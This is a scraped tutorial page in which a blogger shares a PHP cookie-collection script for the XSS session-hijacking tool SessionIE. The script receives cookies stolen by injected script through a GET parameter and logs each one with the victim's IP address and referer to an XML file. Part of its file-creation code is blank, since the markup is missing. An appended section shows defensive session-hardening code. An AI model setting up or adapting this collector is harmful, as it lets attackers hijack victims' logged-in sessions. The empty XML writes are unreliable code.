PHP script for the XSS tool SessionIE (PHP tutorial)

Source: Internet
Author: User
A PHP script for use with the XSS tool SessionIE. I wrote this purely for fun, out of boredom; in the end it is just an XML operation. The reason is that a few days ago http://www.cncert.net released a new XSS utility on our mailing list. It is similar to the foreign tool hamster: the client refreshes regularly so that the session does not time out. Once a user has been hit by the cross-site script, the attacker can stay logged on. This tool uses .NET. For convenience, the cookie collection script is required to save the cookie as an XML file. He provided an ASP program. I only have PHP hosting space, so I wrote a PHP program for testing.
Code:

<?php
date_default_timezone_set("Asia/Chongqing");

// XML file that the collected entries are appended to.
$my_file = "cookie.xml";

// Nothing to do when the x parameter is absent.
if (!isset($_GET['x']))
{
    exit;
}

$my_cookie = $_GET['x'];
if ($_GET['x'] != "")
{
    if (!file_exists($my_file))
    {
        CreateXmlFile();
    }

    AddData($my_cookie);
}

function CreateXmlFile()
{
    global $my_file;

    $fp = fopen($my_file, "wb");
    if (!$fp)
    {
        exit;
    }

    // These five writes create the initial XML skeleton. The markup inside the
    // string literals is missing from this page; AddData() expects the file to
    // contain a <treeroot> root element.
    fwrite($fp, " ");
    fwrite($fp, " ");
    fwrite($fp, " ");
    fwrite($fp, " ");
    fwrite($fp, " ");

    fclose($fp);
}

function AddData($my_cookie)
{
    global $my_file;

    $doc = new DOMDocument();
    $doc->load($my_file);
    $doc->formatOutput = true;

    // Each request becomes one <item> under the root element.
    $treeroot = $doc->getElementsByTagName("treeroot")->item(0);

    $item = $doc->createElement("item");
    $treeroot->appendChild($item);

    // <title>: remote host name if available, otherwise the remote address.
    if (isset($_SERVER["REMOTE_HOST"]))
    {
        $remote_host = $_SERVER["REMOTE_HOST"];
    }
    elseif (isset($_SERVER["REMOTE_ADDR"]))
    {
        $remote_host = $_SERVER["REMOTE_ADDR"];
    }
    else
    {
        $remote_host = "NotCare";
    }
    $title = $doc->createElement("title", $remote_host);
    $item->appendChild($title);

    // <link>: the Referer header, with a fixed fallback.
    if (isset($_SERVER["HTTP_REFERER"]))
    {
        $refer = $_SERVER["HTTP_REFERER"];
    }
    else
    {
        $refer = "http://yahoo.cn";
    }
    $link = $doc->createElement("link", $refer);
    $item->appendChild($link);

    $src_ip = $doc->createElement("src_ip", $_SERVER["REMOTE_ADDR"]);
    $item->appendChild($src_ip);

    $src_os = $doc->createElement("src_os", "NotCare");
    $item->appendChild($src_os);

    $pubDate = $doc->createElement("pubDate", date("r"));
    $item->appendChild($pubDate);

    // <description>: the value received in the x parameter.
    $description = $doc->createElement("description", $my_cookie);
    $item->appendChild($description);

    $doc->save($my_file);
}

?>
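
The tool described above depends on two things: script being able to read the session cookie, and periodic refreshes keeping the session from timing out. As an added example (not part of the original post or of SessionIE), this PHP session setup addresses both on the application side. The constant and function names are hypothetical, and it assumes PHP 7.3 or later on a site served over HTTPS:

```php
<?php
// Added example, not from the original post. All names below are hypothetical.
const ABSOLUTE_LIFETIME = 8 * 3600; // hard cap; refreshing cannot extend it
const IDLE_LIFETIME     = 15 * 60;  // idle cap; a keep-alive refresh defeats this one alone

function client_fingerprint(): string
{
    // Coarse binding only: the User-Agent can be copied, so this merely raises the bar.
    return hash('sha256', $_SERVER['HTTP_USER_AGENT'] ?? '');
}

function start_hardened_session(): bool
{
    ini_set('session.use_strict_mode', '1');  // refuse session IDs the server did not issue
    ini_set('session.use_only_cookies', '1'); // never accept a session ID from the URL
    session_set_cookie_params([
        'lifetime' => 0,
        'path'     => '/',
        'secure'   => true,   // sent over HTTPS only
        'httponly' => true,   // document.cookie cannot read the session ID
        'samesite' => 'Lax',
    ]);
    session_start();

    $now = time();
    if (!isset($_SESSION['created'], $_SESSION['fp'])) {
        $_SESSION['created'] = $now;
        $_SESSION['fp']      = client_fingerprint();
    }

    $expired = ($now - $_SESSION['created']) > ABSOLUTE_LIFETIME
        || ($now - ($_SESSION['last_seen'] ?? $now)) > IDLE_LIFETIME;
    $moved = !hash_equals($_SESSION['fp'], client_fingerprint());

    if ($expired || $moved) {
        $_SESSION = [];
        session_destroy();
        return false; // caller must send the user back to the login page
    }

    $_SESSION['last_seen'] = $now;
    return true;
}

function on_login_success(): void
{
    // Issue a fresh ID at login so an ID captured before authentication is useless.
    session_regenerate_id(true);
    $_SESSION['created'] = time();
}
```

With `httponly` set, `document.cookie` no longer exposes the session ID to injected script, and the absolute lifetime ends a replayed session even when it is refreshed on a timer.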
